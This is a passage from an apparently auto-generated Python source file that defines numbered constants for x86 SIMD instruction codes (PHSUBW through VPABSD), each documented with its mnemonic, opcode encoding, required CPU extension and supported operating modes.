"""
``PHSUBW xmm1, xmm2/m128``
``66 0F 38 05 /r``
``SSSE3``
``16/32/64-bit``
"""
VEX_VPHSUBW_XMM_XMM_XMMM128: int = 2590
"""
``VPHSUBW xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.WIG 05 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPHSUBW_YMM_YMM_YMMM256: int = 2591
"""
``VPHSUBW ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.WIG 05 /r``
``AVX2``
``16/32/64-bit``
"""
PHSUBD_MM_MMM64: int = 2592
"""
``PHSUBD mm1, mm2/m64``
``NP 0F 38 06 /r``
``SSSE3``
``16/32/64-bit``
"""
PHSUBD_XMM_XMMM128: int = 2593
"""
``PHSUBD xmm1, xmm2/m128``
``66 0F 38 06 /r``
``SSSE3``
``16/32/64-bit``
"""
VEX_VPHSUBD_XMM_XMM_XMMM128: int = 2594
"""
``VPHSUBD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.WIG 06 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPHSUBD_YMM_YMM_YMMM256: int = 2595
"""
``VPHSUBD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.WIG 06 /r``
``AVX2``
``16/32/64-bit``
"""
PHSUBSW_MM_MMM64: int = 2596
"""
``PHSUBSW mm1, mm2/m64``
``NP 0F 38 07 /r``
``SSSE3``
``16/32/64-bit``
"""
PHSUBSW_XMM_XMMM128: int = 2597
"""
``PHSUBSW xmm1, xmm2/m128``
``66 0F 38 07 /r``
``SSSE3``
``16/32/64-bit``
"""
VEX_VPHSUBSW_XMM_XMM_XMMM128: int = 2598
"""
``VPHSUBSW xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.WIG 07 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPHSUBSW_YMM_YMM_YMMM256: int = 2599
"""
``VPHSUBSW ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.WIG 07 /r``
``AVX2``
``16/32/64-bit``
"""
PSIGNB_MM_MMM64: int = 2600
"""
``PSIGNB mm1, mm2/m64``
``NP 0F 38 08 /r``
``SSSE3``
``16/32/64-bit``
"""
PSIGNB_XMM_XMMM128: int = 2601
"""
``PSIGNB xmm1, xmm2/m128``
``66 0F 38 08 /r``
``SSSE3``
``16/32/64-bit``
"""
VEX_VPSIGNB_XMM_XMM_XMMM128: int = 2602
"""
``VPSIGNB xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.WIG 08 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPSIGNB_YMM_YMM_YMMM256: int = 2603
"""
``VPSIGNB ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.WIG 08 /r``
``AVX2``
``16/32/64-bit``
"""
PSIGNW_MM_MMM64: int = 2604
"""
``PSIGNW mm1, mm2/m64``
``NP 0F 38 09 /r``
``SSSE3``
``16/32/64-bit``
"""
PSIGNW_XMM_XMMM128: int = 2605
"""
``PSIGNW xmm1, xmm2/m128``
``66 0F 38 09 /r``
``SSSE3``
``16/32/64-bit``
"""
VEX_VPSIGNW_XMM_XMM_XMMM128: int = 2606
"""
``VPSIGNW xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.WIG 09 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPSIGNW_YMM_YMM_YMMM256: int = 2607
"""
``VPSIGNW ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.WIG 09 /r``
``AVX2``
``16/32/64-bit``
"""
PSIGND_MM_MMM64: int = 2608
"""
``PSIGND mm1, mm2/m64``
``NP 0F 38 0A /r``
``SSSE3``
``16/32/64-bit``
"""
PSIGND_XMM_XMMM128: int = 2609
"""
``PSIGND xmm1, xmm2/m128``
``66 0F 38 0A /r``
``SSSE3``
``16/32/64-bit``
"""
VEX_VPSIGND_XMM_XMM_XMMM128: int = 2610
"""
``VPSIGND xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.WIG 0A /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPSIGND_YMM_YMM_YMMM256: int = 2611
"""
``VPSIGND ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.WIG 0A /r``
``AVX2``
``16/32/64-bit``
"""
PMULHRSW_MM_MMM64: int = 2612
"""
``PMULHRSW mm1, mm2/m64``
``NP 0F 38 0B /r``
``SSSE3``
``16/32/64-bit``
"""
PMULHRSW_XMM_XMMM128: int = 2613
"""
``PMULHRSW xmm1, xmm2/m128``
``66 0F 38 0B /r``
``SSSE3``
``16/32/64-bit``
"""
VEX_VPMULHRSW_XMM_XMM_XMMM128: int = 2614
"""
``VPMULHRSW xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.WIG 0B /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPMULHRSW_YMM_YMM_YMMM256: int = 2615
"""
``VPMULHRSW ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.WIG 0B /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPMULHRSW_XMM_K1Z_XMM_XMMM128: int = 2616
"""
``VPMULHRSW xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F38.WIG 0B /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMULHRSW_YMM_K1Z_YMM_YMMM256: int = 2617
"""
``VPMULHRSW ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F38.WIG 0B /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMULHRSW_ZMM_K1Z_ZMM_ZMMM512: int = 2618
"""
``VPMULHRSW zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F38.WIG 0B /r``
``AVX512BW``
``16/32/64-bit``
"""
VEX_VPERMILPS_XMM_XMM_XMMM128: int = 2619
"""
``VPERMILPS xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W0 0C /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPERMILPS_YMM_YMM_YMMM256: int = 2620
"""
``VPERMILPS ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W0 0C /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VPERMILPS_XMM_K1Z_XMM_XMMM128B32: int = 2621
"""
``VPERMILPS xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 0C /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPERMILPS_YMM_K1Z_YMM_YMMM256B32: int = 2622
"""
``VPERMILPS ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 0C /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPERMILPS_ZMM_K1Z_ZMM_ZMMM512B32: int = 2623
"""
``VPERMILPS zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.66.0F38.W0 0C /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_VPERMILPD_XMM_XMM_XMMM128: int = 2624
"""
``VPERMILPD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W0 0D /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPERMILPD_YMM_YMM_YMMM256: int = 2625
"""
``VPERMILPD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W0 0D /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VPERMILPD_XMM_K1Z_XMM_XMMM128B64: int = 2626
"""
``VPERMILPD xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 0D /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPERMILPD_YMM_K1Z_YMM_YMMM256B64: int = 2627
"""
``VPERMILPD ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 0D /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPERMILPD_ZMM_K1Z_ZMM_ZMMM512B64: int = 2628
"""
``VPERMILPD zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F38.W1 0D /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_VTESTPS_XMM_XMMM128: int = 2629
"""
``VTESTPS xmm1, xmm2/m128``
``VEX.128.66.0F38.W0 0E /r``
``AVX``
``16/32/64-bit``
"""
VEX_VTESTPS_YMM_YMMM256: int = 2630
"""
``VTESTPS ymm1, ymm2/m256``
``VEX.256.66.0F38.W0 0E /r``
``AVX``
``16/32/64-bit``
"""
VEX_VTESTPD_XMM_XMMM128: int = 2631
"""
``VTESTPD xmm1, xmm2/m128``
``VEX.128.66.0F38.W0 0F /r``
``AVX``
``16/32/64-bit``
"""
VEX_VTESTPD_YMM_YMMM256: int = 2632
"""
``VTESTPD ymm1, ymm2/m256``
``VEX.256.66.0F38.W0 0F /r``
``AVX``
``16/32/64-bit``
"""
PBLENDVB_XMM_XMMM128: int = 2633
"""
``PBLENDVB xmm1, xmm2/m128, <XMM0>``
``66 0F 38 10 /r``
``SSE4.1``
``16/32/64-bit``
"""
EVEX_VPSRLVW_XMM_K1Z_XMM_XMMM128: int = 2634
"""
``VPSRLVW xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F38.W1 10 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSRLVW_YMM_K1Z_YMM_YMMM256: int = 2635
"""
``VPSRLVW ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F38.W1 10 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSRLVW_ZMM_K1Z_ZMM_ZMMM512: int = 2636
"""
``VPSRLVW zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F38.W1 10 /r``
``AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMOVUSWB_XMMM64_K1Z_XMM: int = 2637
"""
``VPMOVUSWB xmm1/m64 {k1}{z}, xmm2``
``EVEX.128.F3.0F38.W0 10 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMOVUSWB_XMMM128_K1Z_YMM: int = 2638
"""
``VPMOVUSWB xmm1/m128 {k1}{z}, ymm2``
``EVEX.256.F3.0F38.W0 10 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMOVUSWB_YMMM256_K1Z_ZMM: int = 2639
"""
``VPMOVUSWB ymm1/m256 {k1}{z}, zmm2``
``EVEX.512.F3.0F38.W0 10 /r``
``AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSRAVW_XMM_K1Z_XMM_XMMM128: int = 2640
"""
``VPSRAVW xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F38.W1 11 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSRAVW_YMM_K1Z_YMM_YMMM256: int = 2641
"""
``VPSRAVW ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F38.W1 11 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSRAVW_ZMM_K1Z_ZMM_ZMMM512: int = 2642
"""
``VPSRAVW zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F38.W1 11 /r``
``AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMOVUSDB_XMMM32_K1Z_XMM: int = 2643
"""
``VPMOVUSDB xmm1/m32 {k1}{z}, xmm2``
``EVEX.128.F3.0F38.W0 11 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVUSDB_XMMM64_K1Z_YMM: int = 2644
"""
``VPMOVUSDB xmm1/m64 {k1}{z}, ymm2``
``EVEX.256.F3.0F38.W0 11 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVUSDB_XMMM128_K1Z_ZMM: int = 2645
"""
``VPMOVUSDB xmm1/m128 {k1}{z}, zmm2``
``EVEX.512.F3.0F38.W0 11 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPSLLVW_XMM_K1Z_XMM_XMMM128: int = 2646
"""
``VPSLLVW xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F38.W1 12 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSLLVW_YMM_K1Z_YMM_YMMM256: int = 2647
"""
``VPSLLVW ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F38.W1 12 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSLLVW_ZMM_K1Z_ZMM_ZMMM512: int = 2648
"""
``VPSLLVW zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F38.W1 12 /r``
``AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMOVUSQB_XMMM16_K1Z_XMM: int = 2649
"""
``VPMOVUSQB xmm1/m16 {k1}{z}, xmm2``
``EVEX.128.F3.0F38.W0 12 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVUSQB_XMMM32_K1Z_YMM: int = 2650
"""
``VPMOVUSQB xmm1/m32 {k1}{z}, ymm2``
``EVEX.256.F3.0F38.W0 12 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVUSQB_XMMM64_K1Z_ZMM: int = 2651
"""
``VPMOVUSQB xmm1/m64 {k1}{z}, zmm2``
``EVEX.512.F3.0F38.W0 12 /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_VCVTPH2PS_XMM_XMMM64: int = 2652
"""
``VCVTPH2PS xmm1, xmm2/m64``
``VEX.128.66.0F38.W0 13 /r``
``F16C``
``16/32/64-bit``
"""
VEX_VCVTPH2PS_YMM_XMMM128: int = 2653
"""
``VCVTPH2PS ymm1, xmm2/m128``
``VEX.256.66.0F38.W0 13 /r``
``F16C``
``16/32/64-bit``
"""
EVEX_VCVTPH2PS_XMM_K1Z_XMMM64: int = 2654
"""
``VCVTPH2PS xmm1 {k1}{z}, xmm2/m64``
``EVEX.128.66.0F38.W0 13 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTPH2PS_YMM_K1Z_XMMM128: int = 2655
"""
``VCVTPH2PS ymm1 {k1}{z}, xmm2/m128``
``EVEX.256.66.0F38.W0 13 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTPH2PS_ZMM_K1Z_YMMM256_SAE: int = 2656
"""
``VCVTPH2PS zmm1 {k1}{z}, ymm2/m256{sae}``
``EVEX.512.66.0F38.W0 13 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVUSDW_XMMM64_K1Z_XMM: int = 2657
"""
``VPMOVUSDW xmm1/m64 {k1}{z}, xmm2``
``EVEX.128.F3.0F38.W0 13 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVUSDW_XMMM128_K1Z_YMM: int = 2658
"""
``VPMOVUSDW xmm1/m128 {k1}{z}, ymm2``
``EVEX.256.F3.0F38.W0 13 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVUSDW_YMMM256_K1Z_ZMM: int = 2659
"""
``VPMOVUSDW ymm1/m256 {k1}{z}, zmm2``
``EVEX.512.F3.0F38.W0 13 /r``
``AVX512F``
``16/32/64-bit``
"""
BLENDVPS_XMM_XMMM128: int = 2660
"""
``BLENDVPS xmm1, xmm2/m128, <XMM0>``
``66 0F 38 14 /r``
``SSE4.1``
``16/32/64-bit``
"""
EVEX_VPRORVD_XMM_K1Z_XMM_XMMM128B32: int = 2661
"""
``VPRORVD xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 14 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPRORVD_YMM_K1Z_YMM_YMMM256B32: int = 2662
"""
``VPRORVD ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 14 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPRORVD_ZMM_K1Z_ZMM_ZMMM512B32: int = 2663
"""
``VPRORVD zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.66.0F38.W0 14 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPRORVQ_XMM_K1Z_XMM_XMMM128B64: int = 2664
"""
``VPRORVQ xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 14 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPRORVQ_YMM_K1Z_YMM_YMMM256B64: int = 2665
"""
``VPRORVQ ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 14 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPRORVQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 2666
"""
``VPRORVQ zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F38.W1 14 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVUSQW_XMMM32_K1Z_XMM: int = 2667
"""
``VPMOVUSQW xmm1/m32 {k1}{z}, xmm2``
``EVEX.128.F3.0F38.W0 14 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVUSQW_XMMM64_K1Z_YMM: int = 2668
"""
``VPMOVUSQW xmm1/m64 {k1}{z}, ymm2``
``EVEX.256.F3.0F38.W0 14 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVUSQW_XMMM128_K1Z_ZMM: int = 2669
"""
``VPMOVUSQW xmm1/m128 {k1}{z}, zmm2``
``EVEX.512.F3.0F38.W0 14 /r``
``AVX512F``
``16/32/64-bit``
"""
BLENDVPD_XMM_XMMM128: int = 2670
"""
``BLENDVPD xmm1, xmm2/m128, <XMM0>``
``66 0F 38 15 /r``
``SSE4.1``
``16/32/64-bit``
"""
EVEX_VPROLVD_XMM_K1Z_XMM_XMMM128B32: int = 2671
"""
``VPROLVD xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 15 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPROLVD_YMM_K1Z_YMM_YMMM256B32: int = 2672
"""
``VPROLVD ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 15 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPROLVD_ZMM_K1Z_ZMM_ZMMM512B32: int = 2673
"""
``VPROLVD zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.66.0F38.W0 15 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPROLVQ_XMM_K1Z_XMM_XMMM128B64: int = 2674
"""
``VPROLVQ xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 15 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPROLVQ_YMM_K1Z_YMM_YMMM256B64: int = 2675
"""
``VPROLVQ ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 15 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPROLVQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 2676
"""
``VPROLVQ zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F38.W1 15 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVUSQD_XMMM64_K1Z_XMM: int = 2677
"""
``VPMOVUSQD xmm1/m64 {k1}{z}, xmm2``
``EVEX.128.F3.0F38.W0 15 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVUSQD_XMMM128_K1Z_YMM: int = 2678
"""
``VPMOVUSQD xmm1/m128 {k1}{z}, ymm2``
``EVEX.256.F3.0F38.W0 15 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVUSQD_YMMM256_K1Z_ZMM: int = 2679
"""
``VPMOVUSQD ymm1/m256 {k1}{z}, zmm2``
``EVEX.512.F3.0F38.W0 15 /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_VPERMPS_YMM_YMM_YMMM256: int = 2680
"""
``VPERMPS ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W0 16 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPERMPS_YMM_K1Z_YMM_YMMM256B32: int = 2681
"""
``VPERMPS ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 16 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPERMPS_ZMM_K1Z_ZMM_ZMMM512B32: int = 2682
"""
``VPERMPS zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.66.0F38.W0 16 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPERMPD_YMM_K1Z_YMM_YMMM256B64: int = 2683
"""
``VPERMPD ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 16 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPERMPD_ZMM_K1Z_ZMM_ZMMM512B64: int = 2684
"""
``VPERMPD zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F38.W1 16 /r``
``AVX512F``
``16/32/64-bit``
"""
PTEST_XMM_XMMM128: int = 2685
"""
``PTEST xmm1, xmm2/m128``
``66 0F 38 17 /r``
``SSE4.1``
``16/32/64-bit``
"""
VEX_VPTEST_XMM_XMMM128: int = 2686
"""
``VPTEST xmm1, xmm2/m128``
``VEX.128.66.0F38.WIG 17 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPTEST_YMM_YMMM256: int = 2687
"""
``VPTEST ymm1, ymm2/m256``
``VEX.256.66.0F38.WIG 17 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VBROADCASTSS_XMM_M32: int = 2688
"""
``VBROADCASTSS xmm1, m32``
``VEX.128.66.0F38.W0 18 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VBROADCASTSS_YMM_M32: int = 2689
"""
``VBROADCASTSS ymm1, m32``
``VEX.256.66.0F38.W0 18 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VBROADCASTSS_XMM_K1Z_XMMM32: int = 2690
"""
``VBROADCASTSS xmm1 {k1}{z}, xmm2/m32``
``EVEX.128.66.0F38.W0 18 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VBROADCASTSS_YMM_K1Z_XMMM32: int = 2691
"""
``VBROADCASTSS ymm1 {k1}{z}, xmm2/m32``
``EVEX.256.66.0F38.W0 18 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VBROADCASTSS_ZMM_K1Z_XMMM32: int = 2692
"""
``VBROADCASTSS zmm1 {k1}{z}, xmm2/m32``
``EVEX.512.66.0F38.W0 18 /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_VBROADCASTSD_YMM_M64: int = 2693
"""
``VBROADCASTSD ymm1, m64``
``VEX.256.66.0F38.W0 19 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VBROADCASTF32X2_YMM_K1Z_XMMM64: int = 2694
"""
``VBROADCASTF32X2 ymm1 {k1}{z}, xmm2/m64``
``EVEX.256.66.0F38.W0 19 /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VBROADCASTF32X2_ZMM_K1Z_XMMM64: int = 2695
"""
``VBROADCASTF32X2 zmm1 {k1}{z}, xmm2/m64``
``EVEX.512.66.0F38.W0 19 /r``
``AVX512DQ``
``16/32/64-bit``
"""
EVEX_VBROADCASTSD_YMM_K1Z_XMMM64: int = 2696
"""
``VBROADCASTSD ymm1 {k1}{z}, xmm2/m64``
``EVEX.256.66.0F38.W1 19 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VBROADCASTSD_ZMM_K1Z_XMMM64: int = 2697
"""
``VBROADCASTSD zmm1 {k1}{z}, xmm2/m64``
``EVEX.512.66.0F38.W1 19 /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_VBROADCASTF128_YMM_M128: int = 2698
"""
``VBROADCASTF128 ymm1, m128``
``VEX.256.66.0F38.W0 1A /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VBROADCASTF32X4_YMM_K1Z_M128: int = 2699
"""
``VBROADCASTF32X4 ymm1 {k1}{z}, m128``
``EVEX.256.66.0F38.W0 1A /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VBROADCASTF32X4_ZMM_K1Z_M128: int = 2700
"""
``VBROADCASTF32X4 zmm1 {k1}{z}, m128``
``EVEX.512.66.0F38.W0 1A /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VBROADCASTF64X2_YMM_K1Z_M128: int = 2701
"""
``VBROADCASTF64X2 ymm1 {k1}{z}, m128``
``EVEX.256.66.0F38.W1 1A /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VBROADCASTF64X2_ZMM_K1Z_M128: int = 2702
"""
``VBROADCASTF64X2 zmm1 {k1}{z}, m128``
``EVEX.512.66.0F38.W1 1A /r``
``AVX512DQ``
``16/32/64-bit``
"""
EVEX_VBROADCASTF32X8_ZMM_K1Z_M256: int = 2703
"""
``VBROADCASTF32X8 zmm1 {k1}{z}, m256``
``EVEX.512.66.0F38.W0 1B /r``
``AVX512DQ``
``16/32/64-bit``
"""
EVEX_VBROADCASTF64X4_ZMM_K1Z_M256: int = 2704
"""
``VBROADCASTF64X4 zmm1 {k1}{z}, m256``
``EVEX.512.66.0F38.W1 1B /r``
``AVX512F``
``16/32/64-bit``
"""
PABSB_MM_MMM64: int = 2705
"""
``PABSB mm1, mm2/m64``
``NP 0F 38 1C /r``
``SSSE3``
``16/32/64-bit``
"""
PABSB_XMM_XMMM128: int = 2706
"""
``PABSB xmm1, xmm2/m128``
``66 0F 38 1C /r``
``SSSE3``
``16/32/64-bit``
"""
VEX_VPABSB_XMM_XMMM128: int = 2707
"""
``VPABSB xmm1, xmm2/m128``
``VEX.128.66.0F38.WIG 1C /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPABSB_YMM_YMMM256: int = 2708
"""
``VPABSB ymm1, ymm2/m256``
``VEX.256.66.0F38.WIG 1C /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPABSB_XMM_K1Z_XMMM128: int = 2709
"""
``VPABSB xmm1 {k1}{z}, xmm2/m128``
``EVEX.128.66.0F38.WIG 1C /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPABSB_YMM_K1Z_YMMM256: int = 2710
"""
``VPABSB ymm1 {k1}{z}, ymm2/m256``
``EVEX.256.66.0F38.WIG 1C /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPABSB_ZMM_K1Z_ZMMM512: int = 2711
"""
``VPABSB zmm1 {k1}{z}, zmm2/m512``
``EVEX.512.66.0F38.WIG 1C /r``
``AVX512BW``
``16/32/64-bit``
"""
PABSW_MM_MMM64: int = 2712
"""
``PABSW mm1, mm2/m64``
``NP 0F 38 1D /r``
``SSSE3``
``16/32/64-bit``
"""
PABSW_XMM_XMMM128: int = 2713
"""
``PABSW xmm1, xmm2/m128``
``66 0F 38 1D /r``
``SSSE3``
``16/32/64-bit``
"""
VEX_VPABSW_XMM_XMMM128: int = 2714
"""
``VPABSW xmm1, xmm2/m128``
``VEX.128.66.0F38.WIG 1D /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPABSW_YMM_YMMM256: int = 2715
"""
``VPABSW ymm1, ymm2/m256``
``VEX.256.66.0F38.WIG 1D /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPABSW_XMM_K1Z_XMMM128: int = 2716
"""
``VPABSW xmm1 {k1}{z}, xmm2/m128``
``EVEX.128.66.0F38.WIG 1D /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPABSW_YMM_K1Z_YMMM256: int = 2717
"""
``VPABSW ymm1 {k1}{z}, ymm2/m256``
``EVEX.256.66.0F38.WIG 1D /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPABSW_ZMM_K1Z_ZMMM512: int = 2718
"""
``VPABSW zmm1 {k1}{z}, zmm2/m512``
``EVEX.512.66.0F38.WIG 1D /r``
``AVX512BW``
``16/32/64-bit``
"""
PABSD_MM_MMM64: int = 2719
"""
``PABSD mm1, mm2/m64``
``NP 0F 38 1E /r``
``SSSE3``
``16/32/64-bit``
"""
PABSD_XMM_XMMM128: int = 2720
"""
``PABSD xmm1, xmm2/m128``
``66 0F 38 1E /r``
``SSSE3``
``16/32/64-bit``
"""
VEX_VPABSD_XMM_XMMM128: int = 2721
"""
``VPABSD xmm1, xmm2/m128``
``VEX.128.66.0F38.WIG 1E /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPABSD_YMM_YMMM256: int = 2722
"""
``VPABSD ymm1, ymm2/m256``
``VEX.256.66.0F38.WIG 1E /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPABSD_XMM_K1Z_XMMM128B32: int = 2723
"""
``VPABSD xmm1 {k1}{z}, xmm2/m128/m32bcst``
``EVEX.128.66.0F38.W0 1E /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPABSD_YMM_K1Z_YMMM256B32: int = 2724
